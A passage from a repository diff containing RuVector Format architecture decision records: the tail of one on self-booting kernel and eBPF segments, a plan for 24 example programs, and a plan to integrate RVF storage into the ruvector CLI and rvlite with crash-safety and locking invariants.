The full registry (23 types) is documented in ADR-029. Available ranges: 0x11-0x1F, 0x24-0x2F, 0x33-0xEF. Values 0xF0-0xFF remain reserved.
## Performance Targets
| Metric | Target | Measurement |
|--------|--------|-------------|
| KERNEL_SEG decompression | <10 ms for 2 MB image | ZSTD streaming decompression benchmark |
| Firecracker boot to init | <50 ms | Firecracker metrics (API socket ready) |
| Kernel init to API ready | <75 ms | Time from init to first successful health check |
| Total cold start (file to API) | <125 ms | End-to-end: read segment, decompress, boot, serve |
| First query after boot | <200 ms | Time to first non-error query response |
| Full recall available | <2 s | Time until Layer C loaded and recall@10 >= 0.95 |
| eBPF load + verify | <20 ms | Time from read to attached + serving |
| eBPF hot-path query | <10 us | BPF map lookup + distance compute |
| Kernel image size (Hermit) | <400 KB uncompressed | Minimal query-serving unikernel |
| Kernel image size (micro-Linux) | <2 MB uncompressed | bzImage with minimal initramfs |
| KERNEL_SEG overhead | <200 KB compressed | ZSTD level 3 on Hermit image |
| Memory footprint (unikernel) | <32 MiB | Firecracker guest memory for 1M vectors |
## Implementation Phases
### Phase 1: Segment Types and Headers (rvf-types)
**Duration**: 1 week
**Status**: **Complete** (as of 2026-02-16)
**Implementation notes**:
- `SegmentType::Kernel = 0x0E`, `SegmentType::Ebpf = 0x0F`, and `SegmentType::Wasm = 0x10` are all defined in `rvf-types/src/segment_type.rs` with `TryFrom<u8>` round-trip support and unit tests.
- The `rvf-runtime` write path (`write_path.rs`) implements `write_kernel_seg()` and `write_ebpf_seg()` methods that accept raw header byte arrays, with round-trip tests.
- **`KernelHeader`** (128-byte `repr(C)` struct) is fully implemented in `rvf-types/src/kernel.rs` with:
- `KernelArch` enum (X86_64, Aarch64, Riscv64, Universal, Unknown) with `TryFrom<u8>`
- `KernelType` enum (Hermit, MicroLinux, Asterinas, WasiPreview2, Custom, TestStub) with `TryFrom<u8>`
- `ApiTransport` enum (TcpHttp, TcpGrpc, Vsock, SharedMem, None) with `TryFrom<u8>`
- 15 `KERNEL_FLAG_*` bitfield constants (bits 0-14)
- `to_bytes()` / `from_bytes()` serialization with compile-time size assertion
- 12 tests: header size, magic, round-trip, bad magic, field offsets, enum round-trips, flag bit positions, api_port network byte order, reserved field zeroing
- **`EbpfHeader`** (64-byte `repr(C)` struct) is fully implemented in `rvf-types/src/ebpf.rs` with:
- `EbpfProgramType` enum (XdpDistance, TcFilter, SocketFilter, Tracepoint, Kprobe, CgroupSkb, Custom) with `TryFrom<u8>`
- `EbpfAttachType` enum (XdpIngress, TcIngress, TcEgress, SocketFilter, CgroupIngress, CgroupEgress, None) with `TryFrom<u8>`
- `to_bytes()` / `from_bytes()` serialization with compile-time size assertion
- 10 tests: header size, magic, round-trip, bad magic, field offsets, enum round-trips, max_dimension, large program size
- **`WasmHeader`** (64-byte `repr(C)` struct) is fully implemented in `rvf-types/src/wasm_bootstrap.rs` with:
- `WasmRole` enum (Microkernel, Interpreter, Combined, Extension, ControlPlane) with `TryFrom<u8>`
- `WasmTarget` enum (Wasm32, WasiP1, WasiP2, Browser, BareTile) with `TryFrom<u8>`
- 8 `WASM_FEAT_*` bitfield constants
- `to_bytes()` / `from_bytes()` serialization with compile-time size assertion
- 10 tests
- All types are exported from `rvf-types/src/lib.rs`.
**Deliverables**:
- [x] Add `Kernel = 0x0E` and `Ebpf = 0x0F` to `SegmentType` enum
- [x] Add `Wasm = 0x10` to `SegmentType` enum
- [x] Define `KernelHeader` (128-byte repr(C) struct) with compile-time size assertion
- [x] Define `EbpfHeader` (64-byte repr(C) struct) with compile-time size assertion
- [x] Define `WasmHeader` (64-byte repr(C) struct) with compile-time size assertion
- [x] Define architecture, kernel type, transport, and program type enums
- [x] Define kernel flags (15 bits) and WASM feature flags (8 bits)
- [ ] Add `KernelPtr` to Level0Root reserved area
- [x] Unit tests for all new types, field offsets, and round-trips (32+ tests)
**Preconditions**: rvf-types crate exists and compiles (satisfied)
**Success criteria**: `cargo test -p rvf-types` passes, all new structs have offset tests -- **MET**
### Phase 2: eBPF Program Embedding + Extraction (rvf-ebpf)
**Duration**: 2 weeks
**Deliverables**:
- New crate `rvf-ebpf` with EBPF_SEG codec (read/write)
- BPF ELF parser (extract program, maps, BTF sections)
- Integration with Aya for program loading and map population
- Hot vector cache loader (HOT_SEG vectors into BPF hash map)
- XDP distance computation program template (L2, cosine)
- Integration test: load EBPF_SEG, attach to test interface, verify distance computation
**Preconditions**: Phase 1 complete, Linux kernel >= 5.15 for BTF support
**Success criteria**: eBPF program loads from EBPF_SEG, computes correct L2 distances on test packets
### Phase 3: Hermit/RustyHermit Unikernel Integration (rvf-kernel)
**Duration**: 3 weeks
**Deliverables**:
- New crate `rvf-kernel` with KERNEL_SEG codec (read/write)
- Hermit-based query server application (links against hermit-kernel)
- VirtIO block driver for reading .rvf file
- Minimal HTTP server (query + health endpoints)
- RVF manifest parser and progressive loader
- Distance computation using Hermit's SIMD support
- KERNEL_SEG builder: compile Hermit app, ZSTD compress, embed in segment
- KERNEL_SEG extractor: read segment, verify hash, decompress
- CI build pipeline for Hermit kernel images (x86_64, aarch64)
**Preconditions**: Phase 1 complete, Hermit toolchain set up
**Success criteria**: Hermit kernel image < 400 KB, compresses to < 200 KB, boots in QEMU
### Phase 4: Firecracker Launcher (rvf-launch)
**Duration**: 2 weeks
**Deliverables**:
- New crate `rvf-launch` (CLI + library)
- Firecracker microVM configuration generator
- Kernel extraction, decompression, and verification pipeline
- VirtIO block device setup (pass .rvf file as read-only disk)
- Network configuration (virtio-net or vsock)
- Health check polling (wait for API ready signal)
- Graceful shutdown (SIGTERM to microVM)
- CLI: `rvf launch mydata.rvf` -- boots and serves
- Integration test: launch .rvf in Firecracker, query via HTTP, verify results
**Preconditions**: Phase 3 complete, Firecracker binary available
**Success criteria**: `rvf launch` boots .rvf file in < 125 ms, first query responds correctly
### Phase 5: TEE Attestation Binding (KERNEL_SEG + WITNESS_SEG)
**Duration**: 3 weeks
**Deliverables**:
- New witness type `KERNEL_ATTESTATION (0x10)` in WITNESS_SEG
- Attestation flow: kernel generates quote, verifier checks measurement chain
- SGX integration (DCAP remote attestation)
- SEV-SNP integration (guest attestation report)
- TDX integration (TD report)
- Cross-check: `KERNEL_SEG.image_hash == measured_image_in_quote`
- End-to-end test: boot in simulated TEE (SoftwareTee), verify attestation chain
- Documentation: threat model, trust boundaries, measurement lifecycle
**Preconditions**: Phase 4 complete, TEE hardware or simulation available
**Success criteria**: Full attestation chain verified in CI with SoftwareTee; manual verification on real SGX/SEV-SNP hardware
## GOAP Plan
### World State (Current — updated 2026-02-16)
```yaml
rvf_types_exists: true
rvf_wire_exists: true
rvf_manifest_exists: true
rvf_runtime_exists: true
rvf_wasm_exists: true
rvf_crypto_exists: true
segment_types_count: 23 # 0x00-0x0D, 0x0E-0x10, 0x20-0x23, 0x30-0x32
kernel_seg_defined: true # SegmentType::Kernel = 0x0E
ebpf_seg_defined: true # SegmentType::Ebpf = 0x0F
wasm_seg_defined: true # SegmentType::Wasm = 0x10
kernel_header_defined: true # KernelHeader (128B repr(C)) in kernel.rs
ebpf_header_defined: true # EbpfHeader (64B repr(C)) in ebpf.rs
wasm_header_defined: true # WasmHeader (64B repr(C)) in wasm_bootstrap.rs
agi_container_defined: true # AgiContainerHeader (64B repr(C)) in agi_container.rs
domain_expansion_types: true # TransferPrior, PolicyKernel, CostCurve segments
kernel_seg_codec: false
ebpf_seg_codec: false
hermit_kernel_built: false
ebpf_program_built: false
firecracker_launcher: false
tee_attestation_binding: false
self_booting_rvf: false
```
### Goal State
```yaml
kernel_seg_defined: true
ebpf_seg_defined: true
kernel_header_defined: true
ebpf_header_defined: true
kernel_seg_codec: true
ebpf_seg_codec: true
hermit_kernel_built: true
ebpf_program_built: true
firecracker_launcher: true
tee_attestation_binding: true
self_booting_rvf: true
```
### Actions
```
Action: define_segment_types
Preconditions: [rvf_types_exists]
Effects: [kernel_seg_defined, ebpf_seg_defined]
Cost: 1
Action: define_kernel_header
Preconditions: [kernel_seg_defined]
Effects: [kernel_header_defined]
Cost: 2
Action: define_ebpf_header
Preconditions: [ebpf_seg_defined]
Effects: [ebpf_header_defined]
Cost: 2
Action: build_kernel_codec
Preconditions: [kernel_header_defined, rvf_wire_exists]
Effects: [kernel_seg_codec]
Cost: 3
Action: build_ebpf_codec
Preconditions: [ebpf_header_defined, rvf_wire_exists]
Effects: [ebpf_seg_codec]
Cost: 3
Action: build_hermit_kernel
Preconditions: [kernel_seg_codec, rvf_manifest_exists]
Effects: [hermit_kernel_built]
Cost: 8
Action: build_ebpf_program
Preconditions: [ebpf_seg_codec]
Effects: [ebpf_program_built]
Cost: 5
Action: build_firecracker_launcher
Preconditions: [hermit_kernel_built, kernel_seg_codec]
Effects: [firecracker_launcher]
Cost: 5
Action: bind_tee_attestation
Preconditions: [firecracker_launcher, rvf_crypto_exists]
Effects: [tee_attestation_binding]
Cost: 8
Action: integrate_self_boot
Preconditions: [firecracker_launcher, ebpf_program_built, tee_attestation_binding]
Effects: [self_booting_rvf]
Cost: 3
```
### Critical Path (A* optimal)
```
define_segment_types (1)
-> define_kernel_header (2)
-> build_kernel_codec (3)
-> build_hermit_kernel (8)
-> build_firecracker_launcher (5)
-> bind_tee_attestation (8)
-> integrate_self_boot (3)
Total cost on critical path: 30
Parallel path (eBPF, runs alongside kernel path):
define_segment_types (1)
-> define_ebpf_header (2)
-> build_ebpf_codec (3)
-> build_ebpf_program (5)
-> [joins at integrate_self_boot]
```
### Milestones
| Milestone | Phase | Success Criteria | Measurable |
|-----------|-------|-----------------|------------|
| **M1: Types defined** | 1 | `SegmentType::Kernel` and `SegmentType::Ebpf` compile, field offset tests pass | `cargo test -p rvf-types` green |
| **M2: eBPF embeds** | 2 | EBPF_SEG round-trips through codec, eBPF program loads in kernel | BPF verifier accepts program from segment |
| **M3: Hermit boots** | 3 | Hermit unikernel reads .rvf via virtio-blk, parses Level 0 manifest | Health endpoint returns 200 in QEMU |
| **M4: Firecracker serves** | 4 | `rvf launch test.rvf` boots, query returns correct nearest neighbors | recall@10 >= 0.70 within 200 ms of boot |
| **M5: TEE attested** | 5 | Attestation chain: file signature -> kernel measurement -> TEE quote verified | SoftwareTee CI test passes; manual SGX test passes |
| **M6: Production ready** | All | All tiers work, performance targets met, documentation complete | All benchmarks meet targets in CI |
## Consequences
### Benefits
1. **Zero-dependency deployment**: A single .rvf file boots and serves queries. No runtime installation, no container image pull, no package manager.
2. **Minimal TCB for confidential computing**: The kernel image is cryptographically measured and attested. The trust chain covers both data and runtime.
3. **Sub-125ms cold start**: Firecracker + unikernel eliminates the multi-second startup of traditional runtimes.
4. **Kernel-level acceleration**: eBPF hot-path queries bypass userspace entirely for cache hits, achieving sub-10 us latency.
5. **Architectural portability**: Kernel images for x86_64, aarch64, and riscv64 can coexist in the same file (multiple KERNEL_SEGs with different `arch` values).
6. **Graceful degradation**: Files with KERNEL_SEG work as pure data files for readers that do not support self-booting. The computational capability is additive.
7. **Post-quantum supply chain**: ML-DSA-65 signatures cover both data integrity and kernel integrity, providing quantum-resistant verification of the entire file.
8. **Edge computing**: Air-gapped and disconnected environments can deploy vector search by transferring a single file.
### Risks
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Hermit kernel too large for practical embedding | Low | Medium | Budget is 2 MB; Hermit minimal builds are ~400 KB. Fallback to stripped micro-Linux. |
| Firecracker not available on target platform | Medium | Medium | Provide alternative VMMs (Cloud Hypervisor, QEMU, Uhyve). KERNEL_SEG is VMM-agnostic. |
| eBPF verifier rejects distance computation program | Low | Low | Use well-tested patterns; distance computation is a bounded loop with known iteration count. |
| TEE hardware unavailable in CI | High | Low | SoftwareTee (0xFE) platform variant for CI testing. Manual verification on real hardware. |
| Kernel image supply chain compromise | Low | Critical | Mandatory signing (ML-DSA-65). Reproducible builds. Build provenance via build_id. |
| Specification complexity delays implementation | Medium | Medium | Phased implementation; each phase is independently useful. eBPF and kernel paths are parallel. |
| WASM + eBPF + unikernel creates confusion about which tier to use | Medium | Low | Clear tier selection logic. Default to host runtime; self-boot is opt-in. |
### Migration Path
1. **No migration required**: Existing RVF files continue to work unchanged.
2. **Opt-in**: Users who want self-booting add KERNEL_SEG via the `rvf-kernel` crate.
3. **CLI tool**: `rvf embed-kernel --arch x86_64 --type hermit mydata.rvf` adds a KERNEL_SEG.
4. **Build pipeline**: CI can produce "bootable" and "data-only" variants of the same .rvf file.
## Related Decisions
- **ADR-029** (RVF canonical format): Defines the segment model, wire format, and manifest structure that KERNEL_SEG and EBPF_SEG extend.
- **ADR-005** (WASM runtime): Defines Tier 1 (WASM microkernel). KERNEL_SEG is Tier 3, complementary.
- **ADR-012** (Security remediation): Establishes the cryptographic signing and attestation framework that KERNEL_SEG reuses.
- **ADR-003** (SIMD optimization): The unikernel's distance computation kernels follow the same SIMD strategy (AVX-512, NEON, WASM v128).
## References
- [Hermit OS](https://hermit-os.org/) -- Rust-native unikernel
- [Firecracker](https://firecracker-microvm.github.io/) -- Secure microVM for serverless
- [Aya](https://aya-rs.dev/book/) -- Rust eBPF framework
- [Asterinas](https://github.com/asterinas/asterinas) -- Linux ABI-compatible Rust framekernel (USENIX ATC 2025)
- [Theseus OS](https://github.com/theseus-os/Theseus) -- Safe-language OS with intralingual design
- [WASI](https://wasi.dev/) -- WebAssembly System Interface
- [fips204 crate](https://crates.io/crates/fips204) -- Pure Rust ML-DSA-65 implementation
- [Confidential Computing Consortium](https://confidentialcomputing.io/)
- [Gramine](https://gramineproject.io/) -- SGX library OS
- [WebAssembly and Unikernels: A Comparative Study](https://arxiv.org/html/2509.09400v1) -- Serverless edge comparison
- [AppImage](https://appimage.org/) -- Self-contained Linux application format
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-02-14 | ruv.io | Initial proposal |
| 1.1 | 2026-02-16 | implementation review | Phase 1 complete: KernelHeader (128B), EbpfHeader (64B), WasmHeader (64B), all enums and flag constants implemented in rvf-types with 32+ tests. Updated GOAP world state. Added WASM_SEG (0x10) and domain expansion types (0x30-0x32) to segment registry. AGI container header (64B) implemented. |

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,173 @@
# ADR-031: RVF Example Repository — 24 Demonstrations Across Four Categories
- **Status**: Accepted
- **Date**: 2026-02-14
- **Supersedes**: None
- **Related**: ADR-029 (RVF Canonical Format), ADR-030 (Computational Container)
## Context
RVF (RuVector Format) is the unified agentic AI format — storage, transfer, and cognitive runtime in one file. The existing six examples (`basic_store`, `progressive_index`, `quantization`, `wire_format`, `crypto_signing`, `filtered_search`) demonstrate core storage and indexing features but do not cover:
- Agentic AI patterns (agent memory, swarm coordination, reasoning traces)
- Practical production patterns (RAG, recommendations, caching, deduplication)
- Vertical domain applications (genomics, finance, medical, legal)
- Exotic capabilities (quantum state, neuromorphic search, self-booting, eBPF)
- Runtime targets (browser/WASM, edge/IoT, serverless, ruvLLM inference)
Without concrete examples, users cannot discover or adopt the full scope of RVF.
## Decision
Create 24 new runnable examples organized into four categories, plus a cross-cutting runtime-targets group. Each example is a standalone `fn main()` in `examples/rvf/examples/` with inline documentation explaining the pattern.
### Category A: Agentic AI (6 examples)
| # | Example | File | What It Demonstrates |
|---|---------|------|---------------------|
| A1 | Agent Memory | `agent_memory.rs` | Persistent agent memory with witness audit trails, session recall |
| A2 | Swarm Knowledge | `swarm_knowledge.rs` | Multi-agent shared knowledge base with concurrent writes |
| A3 | Reasoning Trace | `reasoning_trace.rs` | Store chain-of-thought reasoning with lineage derivation |
| A4 | Tool Cache | `tool_cache.rs` | Cache tool call results with metadata filters and TTL |
| A5 | Agent Handoff | `agent_handoff.rs` | Transfer agent state between instances via RVF file |
| A6 | Experience Replay | `experience_replay.rs` | RL-style experience replay buffer with priority sampling |
### Category B: Practical Production (5 examples)
| # | Example | File | What It Demonstrates |
|---|---------|------|---------------------|
| B1 | Semantic Search | `semantic_search.rs` | Document search engine with metadata-filtered k-NN |
| B2 | Recommendation Engine | `recommendation.rs` | Item recommendations with collaborative filtering embeddings |
| B3 | RAG Pipeline | `rag_pipeline.rs` | Retrieval-augmented generation: chunk, embed, retrieve, rerank |
| B4 | Embedding Cache | `embedding_cache.rs` | LRU embedding cache with temperature tiering and eviction |
| B5 | Dedup Detector | `dedup_detector.rs` | Near-duplicate detection with threshold-based clustering |
### Category C: Vertical Domains (4 examples)
| # | Example | File | What It Demonstrates |
|---|---------|------|---------------------|
| C1 | Genomic Pipeline | `genomic_pipeline.rs` | DNA k-mer embeddings with `.rvdna` domain profile and lineage |
| C2 | Financial Signals | `financial_signals.rs` | Market signal embeddings with TEE attestation witness chains |
| C3 | Medical Imaging | `medical_imaging.rs` | Radiology embedding search with `.rvvis` profile |
| C4 | Legal Discovery | `legal_discovery.rs` | Legal document similarity with `.rvtext` profile and audit trails |
### Category D: Exotic Capabilities (5 examples)
| # | Example | File | What It Demonstrates |
|---|---------|------|---------------------|
| D1 | Self-Booting Service | `self_booting.rs` | RVF with embedded unikernel that boots as a microservice |
| D2 | eBPF Accelerator | `ebpf_accelerator.rs` | eBPF hot-path acceleration for sub-microsecond lookups |
| D3 | Hyperbolic Taxonomy | `hyperbolic_taxonomy.rs` | Hierarchy-aware search in hyperbolic space |
| D4 | Multi-Modal Fusion | `multimodal_fusion.rs` | Text + image embeddings in one RVF file with cross-modal search |
| D5 | Sealed Cognitive Engine | `sealed_engine.rs` | Full cognitive engine: vectors + LoRA + GNN + kernel + witness chain |
### Category E: Runtime Targets (4 examples)
| # | Example | File | What It Demonstrates |
|---|---------|------|---------------------|
| E1 | Browser WASM | `browser_wasm.rs` | Client-side vector search via 5.5 KB WASM microkernel |
| E2 | Edge IoT | `edge_iot.rs` | Constrained device with rvlite-style minimal API |
| E3 | Serverless Function | `serverless_function.rs` | Cold-start optimized RVF for Lambda/Cloud Functions |
| E4 | ruvLLM Inference | `ruvllm_inference.rs` | LLM KV cache + LoRA adapter management backed by RVF |
## Implementation
### File Organization
```
examples/rvf/
Cargo.toml # Updated with 24 new [[example]] entries
examples/
# Existing (6)
basic_store.rs
progressive_index.rs
quantization.rs
wire_format.rs
crypto_signing.rs
filtered_search.rs
# Agentic (6)
agent_memory.rs
swarm_knowledge.rs
reasoning_trace.rs
tool_cache.rs
agent_handoff.rs
experience_replay.rs
# Practical (5)
semantic_search.rs
recommendation.rs
rag_pipeline.rs
embedding_cache.rs
dedup_detector.rs
# Vertical (4)
genomic_pipeline.rs
financial_signals.rs
medical_imaging.rs
legal_discovery.rs
# Exotic (5)
self_booting.rs
ebpf_accelerator.rs
hyperbolic_taxonomy.rs
multimodal_fusion.rs
sealed_engine.rs
# Runtime Targets (4)
browser_wasm.rs
edge_iot.rs
serverless_function.rs
ruvllm_inference.rs
```
### Example Structure
Each example follows this pattern:
```rust
//! # Example Title
//!
//! Category: Agentic | Practical | Vertical | Exotic | Runtime
//!
//! **What this demonstrates:**
//! - Feature A
//! - Feature B
//!
//! **RVF segments used:** VEC, INDEX, WITNESS, ...
//!
//! **Run:** `cargo run --example example_name`
fn main() {
// Self-contained, deterministic, no external dependencies
}
```
### Design Constraints
1. **Self-contained**: Each example runs without external services (databases, APIs, models)
2. **Deterministic**: Seeded RNG produces identical output across runs
3. **Fast**: Each completes in < 2 seconds on commodity hardware
4. **Documented**: Module-level doc comments explain the pattern and RVF segments used
5. **Buildable**: All examples compile against existing RVF crate APIs
### Dependencies
No new crate dependencies beyond what `examples/rvf/Cargo.toml` already provides:
- `rvf-runtime`, `rvf-types`, `rvf-wire`, `rvf-manifest`, `rvf-index`, `rvf-quant`, `rvf-crypto`
- `rand`, `tempfile`, `ed25519-dalek`
## Consequences
### Positive
- Users can discover all RVF capabilities through runnable code
- Each category targets a different audience (AI engineers, domain specialists, systems programmers)
- Examples serve as integration tests for advanced API surface
- The repository becomes a reference implementation catalog
### Negative
- 24 additional files to maintain (mitigated by CI: `cargo build --examples`)
- Some examples simulate external systems (LLM tokens, genomic data) with synthetic data
- Examples may drift from API as crates evolve (mitigated by workspace-level `cargo test`)
### Neutral
- Examples are not benchmarks; performance numbers are illustrative
- Domain-specific examples (genomics, finance) use synthetic data, not real datasets

View File

@@ -0,0 +1,446 @@
# ADR-032: RVF WASM Integration into npx ruvector and rvlite
**Status**: Accepted
**Date**: 2026-02-14
**Deciders**: ruv.io Team
**Supersedes**: None
**Related**: ADR-030 (RVF Cognitive Container), ADR-031 (RVCOW Branching)
---
## Context
The RuVector Format (RVF) ecosystem now ships four npm packages:
| Package | Purpose | Size |
|---------|---------|------|
| `@ruvector/rvf` | Unified TypeScript SDK with auto backend selection | - |
| `@ruvector/rvf-node` | Native N-API bindings (Rust via napi-rs) with AGI methods | - |
| `@ruvector/rvf-wasm` | Browser/edge WASM build | ~46 KB control plane, ~5.5 KB tile |
| `@ruvector/rvf-solver` | Self-learning AGI solver (Thompson Sampling, ReasoningBank, witness chain) | ~160 KB WASM |
| `@ruvector/rvf-mcp-server` | MCP server for AI agent integration | - |
Two existing packages would benefit from RVF integration:
1. **`ruvector` (npx ruvector)** -- The main CLI and SDK package (v0.1.88). It has 28 CLI command groups (7,065 lines), depends on `@ruvector/core`, `@ruvector/attention`, `@ruvector/gnn`, `@ruvector/sona`, but has **no dependency on `@ruvector/rvf`**. It currently uses in-memory vector storage with no persistent file-backed option.
2. **`rvlite`** -- A lightweight multi-query vector database (SQL, SPARQL, Cypher) running entirely in WASM. It uses `ruvector-core` for vectors and IndexedDB for browser persistence. A Rust adapter already exists at `crates/rvf/rvf-adapters/rvlite/` wrapping `RvfStore` as `RvliteCollection`.
The main gap is operational truth: what happens on crash, partial migrate, concurrent writers, browser refresh, and mixed backends. This ADR locks the invariants that keep the integration boring and durable.
---
## Key Invariants
### 1. Single writer rule
Any open store has exactly one writer lease. Node uses a file lock (`flock`). Browser uses a lock record with heartbeat in IndexedDB. Readers are unlimited. A stale lease (heartbeat older than 30 seconds) is recoverable by a new writer.
### 2. Crash ordering rule (rvlite hybrid mode)
RVF is the source of truth for vectors. IndexedDB is a rebuildable cache for metadata.
**Write order:**
1. Write vectors to RVF (append-only, crash-safe)
2. Write metadata to IndexedDB
3. Commit a shared monotonic epoch value in both stores
**On startup:** Compare epochs. If RVF epoch > IndexedDB epoch, rebuild metadata from RVF. If IndexedDB epoch > RVF epoch (should not happen), log warning and trust RVF.
### 3. Backend selection rule
Explicit override beats auto detection. If user passes `--backend rvf`, do not silently fall back to `core` or `memory`. Fail loud with a clear install hint. This prevents data going to the wrong place.
```
Error: @ruvector/rvf is not installed.
Run: npm install @ruvector/rvf
The --backend rvf flag requires this package.
```
### 4. Cross-platform compatibility rule
Every `.rvf` file written by WASM must be readable by Node N-API and vice versa for the same RVF wire version. If a file uses features from a newer version, the header must declare it and the CLI must refuse with an upgrade path:
```
Error: vectors.rvf requires RVF wire version 2, but this CLI supports version 1.
Run: npm update @ruvector/rvf
```
---
## Decision
Integrate `@ruvector/rvf` (and its WASM backend) into both packages in three phases:
### Phase 1: npx ruvector -- Add RVF as optional dependency + CLI command group
**Contract:**
- **Input**: path, dimension, vectors
- **Output**: deterministic `.rvf` file and status metadata
- **Failure**: missing `@ruvector/rvf` package gives error with install instruction (never silent fallback)
- **Success metric**: hooks memory persists across process restart
**Changes:**
1. **package.json** -- Add `@ruvector/rvf` as an optional dependency:
```json
"optionalDependencies": {
"@ruvector/rvf": "^0.1.0"
}
```
2. **src/index.ts** -- Extend platform detection to try RVF after `@ruvector/core`:
```
Detection order:
1. @ruvector/core (native Rust -- fastest)
2. @ruvector/rvf (RVF store -- persistent, file-backed)
3. Stub fallback (in-memory, testing only)
```
If `--backend rvf` is explicit, skip detection and fail if unavailable.
3. **bin/cli.js** -- Add `rvf` command group before the `mcp` command (~line 7010):
```
ruvector rvf create <path> Create a new .rvf store
ruvector rvf ingest <path> <file> Ingest vectors from JSON/CSV
ruvector rvf query <path> <vector> k-NN search
ruvector rvf status <path> Show store statistics
ruvector rvf segments <path> List all segments
ruvector rvf derive <path> <child> Create derived store with lineage
ruvector rvf compact <path> Reclaim deleted space
ruvector rvf export <path> Export store
```
4. **src/core/rvf-wrapper.ts** -- Create wrapper module exposing `RvfDatabase` through the existing core interface pattern. Must match the core interface exactly so callers are backend-agnostic. Exports added to `src/core/index.ts`.
5. **Hooks integration** -- Add `ruvector hooks rvf-backend` subcommand to use `.rvf` files as persistent vector memory backend. The `--backend rvf` flag requires explicit selection; recall is read-only by default.
### Phase 2: rvlite -- RVF as storage backend for vector data
**Contract:**
- **Input**: existing rvlite database state (vectors + metadata + graphs)
- **Output**: `.rvf` file for vectors plus IndexedDB metadata cache
- **Failure**: crash mid-sync triggers epoch reconciliation on next open (self-healing)
- **Success metric**: migrate tool is idempotent and safe to rerun
**Changes:**
1. **Rust crate (`crates/rvlite`)** -- Add optional `rvf-runtime` dependency behind a feature flag:
```toml
[features]
default = []
rvf-backend = ["rvf-runtime", "rvf-types"]
```
Default stays unchanged. No behavior change unless feature is enabled.
2. **Hybrid persistence model:**
- **Vectors**: Stored in `.rvf` file via `RvliteCollection` adapter (already exists at `rvf-adapters/rvlite/`)
- **Metadata/Graphs**: Continue using IndexedDB JSON state (SQL tables, Cypher nodes/edges, SPARQL triples)
- **Epoch reconciliation**: Both stores share a monotonic epoch. On startup, compare and rebuild the lagging side.
- RVF vector IDs map directly to rvlite SQL primary keys (no internal mapping layer -- IDs are u64 in both systems).
3. **npm package (`npm/packages/rvlite`)** -- Add `@ruvector/rvf-wasm` as optional dependency. Extend `RvLite` TypeScript class:
```typescript
// New factory method
static async createWithRvf(config: RvLiteConfig & { rvfPath: string }): Promise<RvLite>
// New methods
async saveToRvf(path: string): Promise<void>
async loadFromRvf(path: string): Promise<void>
```
4. **Migration utility** -- `rvlite rvf-migrate` CLI command to convert existing IndexedDB vector data into `.rvf` files. Supports `--dry-run` and `--verify` modes. Idempotent: rerunning on an already-migrated store is a no-op.
5. **Rebuild command** -- `rvlite rvf-rebuild` reconstructs IndexedDB metadata from RVF when cache is missing or corrupted.
### Phase 3: Shared WASM backend unification
**Contract:**
- **Input**: browser environment with both `ruvector` and `rvlite` installed
- **Output**: one shared WASM engine instance resolved through a single import path
- **Success metric**: bundle diff shows zero duplicate WASM; CI check enforces this
**Changes:**
1. **Single WASM build** -- Both `rvlite` and `ruvector` share `@ruvector/rvf-wasm` as the vector computation engine in browser environments, eliminating duplicate WASM binaries.
2. **MCP bridge** -- The existing `@ruvector/rvf-mcp-server` exposes all RVF operations to AI agents. Extend with rvlite-specific tools (read-only by default unless `--write` flag is set):
```
rvlite_sql(storeId, query) Execute SQL over RVF-backed store
rvlite_cypher(storeId, query) Execute Cypher query
rvlite_sparql(storeId, query) Execute SPARQL query
```
3. **Core export consolidation** -- `ruvector` re-exports `RvfDatabase` so downstream consumers use a single import:
```typescript
import { RvfDatabase } from 'ruvector';
```
4. **CI duplicate check** -- Build step that fails if two copies of the WASM artifact are present in the bundle.
---
## API Mapping
### ruvector hooks system -> RVF
| Hooks Operation | Current Implementation | RVF Equivalent |
|----------------|----------------------|----------------|
| `hooks remember` | In-memory vector store | `RvfDatabase.ingestBatch()` |
| `hooks recall` | In-memory k-NN | `RvfDatabase.query()` (read-only) |
| `hooks export` | JSON dump | `RvfDatabase.segments()` + file copy |
| `hooks stats` | Runtime counters | `RvfDatabase.status()` |
### rvlite -> RVF
| RvLite Operation | Current Implementation | RVF Equivalent |
|-----------------|----------------------|----------------|
| `insert(vector)` | `VectorDB.add()` (ruvector-core) | `RvliteCollection.add()` |
| `search(query, k)` | `VectorDB.search()` | `RvliteCollection.search()` |
| `delete(id)` | `VectorDB.remove()` | `RvliteCollection.remove()` |
| `save()` | IndexedDB serialization | `RvfStore` file (automatic) |
| `load()` | IndexedDB deserialization | `RvliteCollection.open()` |
### RVF WASM exports used
| Export | Used By | Purpose |
|--------|---------|---------|
| `rvf_store_create` | Both | Initialize in-memory store |
| `rvf_store_ingest` | Both | Batch vector ingestion |
| `rvf_store_query` | Both | k-NN search |
| `rvf_store_delete` | Both | Soft-delete vectors |
| `rvf_store_export` | ruvector | Serialize to `.rvf` bytes |
| `rvf_store_open` | rvlite | Parse `.rvf` into queryable store |
| `rvf_store_count` | Both | Live vector count |
| `rvf_store_status` | ruvector | Store statistics |
---
## Consequences
### Positive
- **Persistent vector storage** -- `npx ruvector` gains file-backed vector storage (`.rvf` files) for the first time, enabling hooks intelligence to survive across sessions.
- **Single format** -- Both packages read/write the same `.rvf` binary format, enabling data interchange.
- **Reduced bundle size** -- Sharing `@ruvector/rvf-wasm` (~46 KB) between packages eliminates duplicate vector engines.
- **Lineage tracking** -- `RvfDatabase.derive()` brings COW branching and provenance to both packages.
- **Cross-platform** -- RVF auto-selects N-API (Node.js) or WASM (browser) without user configuration.
- **Self-healing** -- Epoch reconciliation means crashes never corrupt data permanently.
### Negative
- **Optional dependency complexity** -- Both packages must gracefully handle missing `@ruvector/rvf` at runtime.
- **Dual persistence in rvlite** -- Vectors in `.rvf` files + metadata in IndexedDB adds a split-brain risk. Mitigated by epoch reconciliation and treating IndexedDB as rebuildable cache.
- **API surface growth** -- `npx ruvector` gains 8 new CLI subcommands.
### Risks
| Risk | Severity | Mitigation |
|------|----------|------------|
| IndexedDB + RVF sync crash | High | Write RVF first (append-only, crash-safe). IndexedDB is rebuildable. Epoch reconciliation on startup. |
| WASM size budget | Low | Adding ~46 KB to rvlite's ~850 KB bundle is <6% increase. |
| Concurrent open in two tabs | Medium | Writer lease with heartbeat in IndexedDB. Stale lease (>30s) is recoverable. Second writer gets clear error. |
| Version skew across packages | Medium | RVF header version gate. CI compatibility test matrix: WASM-written files must be readable by Node and vice versa. |
